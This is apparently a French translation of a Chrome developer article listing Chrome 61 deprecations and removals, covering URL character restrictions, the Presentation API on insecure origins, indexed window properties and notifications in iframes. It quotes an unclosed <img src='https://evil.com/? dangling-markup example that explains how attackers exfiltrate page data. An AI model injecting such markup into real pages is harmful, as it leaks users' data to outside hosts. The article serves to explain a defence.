Abandons et suppressions dans Chrome 61

Joe Medley
Joe Medley

Dans presque chaque version de Chrome, nous constatons un grand nombre de mises à jour et d'améliorations du produit, de ses performances et des fonctionnalités de la plate-forme Web. Cet article décrit les abandons et les suppressions dans Chrome 61, en version bêta depuis le 3 août. Cette liste est susceptible d'être modifiée à tout moment.

Sécurité et confidentialité

Bloquer les ressources dont les URL contiennent les caractères "\n" et "<"

Il existe un type de piratage appelé injection de balisage pendant une période qui consiste à utiliser une URL tronquée pour envoyer des données à un point de terminaison externe. Prenons l'exemple d'une page contenant <img src='https://evil.com/?. Étant donné que l'URL n'a pas de guillemet fermant, les navigateurs lisent jusqu'au guillemet suivant qui se produit et traitent les caractères entre eux comme s'il s'agissait d'une URL unique.

Chrome 61 atténue cette faille en limitant les jeux de caractères autorisés dans les attributs href et src. Plus précisément, Chrome cesse de traiter les URL lorsqu'il détecte de nouveaux caractères de ligne (\n) et moins de caractères (<).

Les développeurs ayant un cas d'utilisation légitime d'une nouvelle ligne et comportant moins de caractères dans une URL doivent plutôt échapper ces caractères.

Intention de suppression | Outil de suivi Chromestatus | Bug Chromium

Abandon et suppression de l'API Presentation sur les contextes non sécurisés

Il a été constaté que sur des origines non sécurisées, l'API Presentation peut être utilisée comme vecteur de piratage sur des origines non sécurisées. Comme les écrans n'ont pas de barre d'adresse, l'API peut être utilisée pour usurper du contenu. Il est également possible d'exfiltrer des données de la présentation en cours.

Conformément à l'intention de Blink de supprimer les fonctionnalités puissantes sur les origines non sécurisées, nous prévoyons d'abandonner et de supprimer la prise en charge de l'API Presentation sur les contextes non sécurisés. À partir de Chrome 61, PresentationRequest.start() ne fonctionnera plus sur les origines non sécurisées.

Intention de suppression | Outil de suivi Chromestatus | Bug Chromium

JavaScript

Interdire la définition des propriétés indexées sur les fenêtres

Auparavant, certains navigateurs autorisaient les attributions JavaScript telles que les suivantes:

    window[0] = 1;

La spécification HTML actuelle indique qu'il s'agit d'une violation explicite de la spécification JavaScript. Par conséquent, cette fonctionnalité est supprimée dans Chrome 61. Depuis février 2016, Firefox est déjà conforme.

Bug Chromium

Supprimer l'utilisation des notifications dans des cadres iFrame non sécurisés

Les demandes d'autorisation provenant d'iFrames peuvent prêter à confusion, car il est difficile de faire la distinction entre l'origine de la page parent et celle de l'iFrame à l'origine de la demande. Lorsque le champ d'application des requêtes n'est pas clair, il est difficile pour les utilisateurs de déterminer s'ils doivent accorder ou refuser l'autorisation.

Le fait d'interdire les notifications dans les iFrames harmonise également les exigences d'autorisation de notification avec celles des notifications push, ce qui simplifie la tâche des développeurs.

Les développeurs qui ont besoin de cette fonctionnalité peuvent ouvrir une nouvelle fenêtre pour demander une autorisation de notification.

Intention de suppression | Outil de suivi Chromestatus | Bug Chromium